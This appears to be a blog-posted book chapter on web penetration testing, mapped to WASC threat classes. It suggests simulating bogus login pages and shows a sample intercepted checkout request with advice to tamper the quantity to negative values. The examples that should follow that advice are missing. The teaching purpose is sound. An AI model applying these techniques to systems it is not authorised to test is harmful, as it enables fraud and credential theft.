June 26, 2011, 9:08 a.m.
posted by creed
This section covers some other areas that were not covered under OWASP’s Top Ten.
This section correlates to 1.2 of the WASC Threat Classifications.
Insufficient Authentication is a condition that is highly subjective. While pen testing you need to keep a sharp eye out for access to sensitive content or functionality where authentication is not required. The most overt example is unauthenticated access to administrative capabilities. This is blatantly a problem with targets that have engaged in security by obscurity for whatever reason. Referring back to what you learned about discovery in Chapter 2, the resource enumeration functions are very useful here, so analyze the exposed resources carefully and document anything that seems odd.
This section correlates to 1.3 of the WASC Threat Classifications.
Weak Password Recovery Validation is a problem when entities try to be too user friendly. This type of functionality is such that via the web a user is allowed to initiate some password recovery process. You must look for flaws that allow you (or an attacker) to change or recover another user’s password. Report on situations where the required information is either easily guessed or can easily be circumvented. The three common web-based techniques used for password recovery are as follows:
Stored Password Hints
Secret Question and Answer
This section correlates to 3.1 of the WASC Threat Classifications.
Although this is not directly related to the pen testing, what can be done is to gauge whether or not your target is highly susceptible to Content Spoofing. Content Spoofing attacks trick end users into believing that content appearing on a bogus site is legitimate. Phishing attacks are the obvious examples of this that most people are aware of these days. This is where specially crafted content is presented to a user. If the user visits the malicious target, she will believe she is viewing authentic content from the legitimate location when in fact she is not.
One example you can use to educate your target is to simulate bogus login pages that end users will think are legitimate. This is an area that requires creativity and though some targets are not interested in it, it is necessary for them to know how easy or difficult it is for their content to be spoofed.
This section correlates to 5.2 of the WASC Threat Classifications.
Information leakage can show itself in many different forms. You have seen numerous areas of potential leakage take shape during the Discovery phase in Chapter 3. But once you are actually hitting your target directly, more information may be leaked. So bear these points in mind when you are actually performing the Attack Simulations throughout the rest of the book:
Once you have local copies of the target web pages you may find useful information in hidden field variables of the HTML forms or comments in the HTML.
The following are excellent potential sources of leaked information:
Welcome and Farewell messages
Debug and error messages
Technical manuals (once you have identified the target environment)
User forums related to the target application
This section correlates to 6.1 of the WASC Threat Classifications.
Abuse of Functionality is an attack technique where legitimate functionality is twisted into malicious functionality. For example, envision a bulletin board Web application that reloads pages dynamically from data in a DB. If an attacker injects some crafted code into the DB, she will get data fed to her every time that page is loaded and the DB touched. Hence she has abused legitimate functionality.
The manual manipulation of data sent to the server or application can yield interesting results. It requires special knowledge and possibly the use of specific tools but it will probably give you the deepest understanding of your target. One tactic is to save web pages locally. You can do this individually, or use HTTrack as discussed earlier. Saving pages locally and determining which segment of code to alter can be a tedious effort and may require knowledge of scripting languages, but this is essential so take a look at a basic example here.
It is important to note that the use of a Proxy server can save you hours of work and is the preferred method of this type of audit. A good Proxy server grants you tremendous power and in particular it allows you to trap raw HTTP requests. The requests can be stalled before they actually get sent to the server. Then the pen tester can analyze, edit, and finally submit them. For instance, assume you are testing the quantity field of an e-commerce application. The purchase amount would most likely be displayed in a drop-down list box. For this example assume the allowed quantities range from 1 to 5. Using a Proxy server, a raw legitimate client-side HTTP transaction could potentially look like this:
POST /cart_checkout.jsp HTTP/1.1 ... Cookie: rememberUID=; rememberUPW=; JSESSIONID=BKPn89L10wVYYgpSZF4TLrgrz3SsywFdGTyXbjT2GH; Authorization: Basic QW5kcmVzOlllYWggaXQncyBtZQ== mode=purchase&product=123456&desc=pc&quantity=1& ...
For the purpose of testing server-side validation, you can alter this type of data before it is sent to the server. Using a Proxy you can stall transactions and, for instance, modify the quantity field to determine if negative quantities are accepted. Depending on the Business Logic Tier this may even provide you with a credit! So play around; in this example you could potentially modify the quantity value by adding a negative sign as such:
This same tactic will allow you to test the quantity boundaries in either direction. For example, you could also send the following to the app and see how it responds:
This section correlates to 6.3 of the WASC Threat Classifications.
Insufficient Anti-automation is when a web site allows so much automation that the concept of checks and balances is null. In scenarios like this, a breach can go undetected for long periods of time and the extent of damage is virtually impossible to determine. Look for these types of automated processes in your manual analysis and use your judgment to determine if any risk is at hand.
This section correlates to 6.4 of the WASC Threat Classifications.
Insufficient Process Validation is when a Web app inadvertently permits the bypassing of built-in flow controls. For example, envision a site that takes a user through a series of steps toward registration. It builds upon some stateful data set along the way to ultimately ingest into the DB. If this registration, or worse yet some related approval process can be bypassed, then the process has flaws that you would need to identify. One of the critical areas to reference for these types of probes is the session section.
If you are dealing with any compiled code, you may need to investigate it on a non-functional level. What you will look for is whether or not the binary files can be deconstructed. You also try to clearly identify the communication protocols to execute the data transmissions between the server and client. In a sense that is a mild form of decompilation. If you are up against compiled code that was, for instance, written in C/C++, then success in this arena will most likely be limited. If on the other hand you are up against Java code, you have some options if you can get your hands on the .class files and the developers did not use effective variable obfuscation during the bytecode compilation process.
Another form of reverse engineering is to deconstruct logic from the error/debug messages in application outputs and behavior patterns. This can lead to a deep understanding of how the target application operates. You can simply force errors via a browser, or in code, and analyze the behavioral patterns of the target application. There is no formula or technique that can really teach this. The best course of learning is to set up a lab environment and then approach, as an outsider, applications that you know. This way you can start learning how to identify behavior based on your knowledge.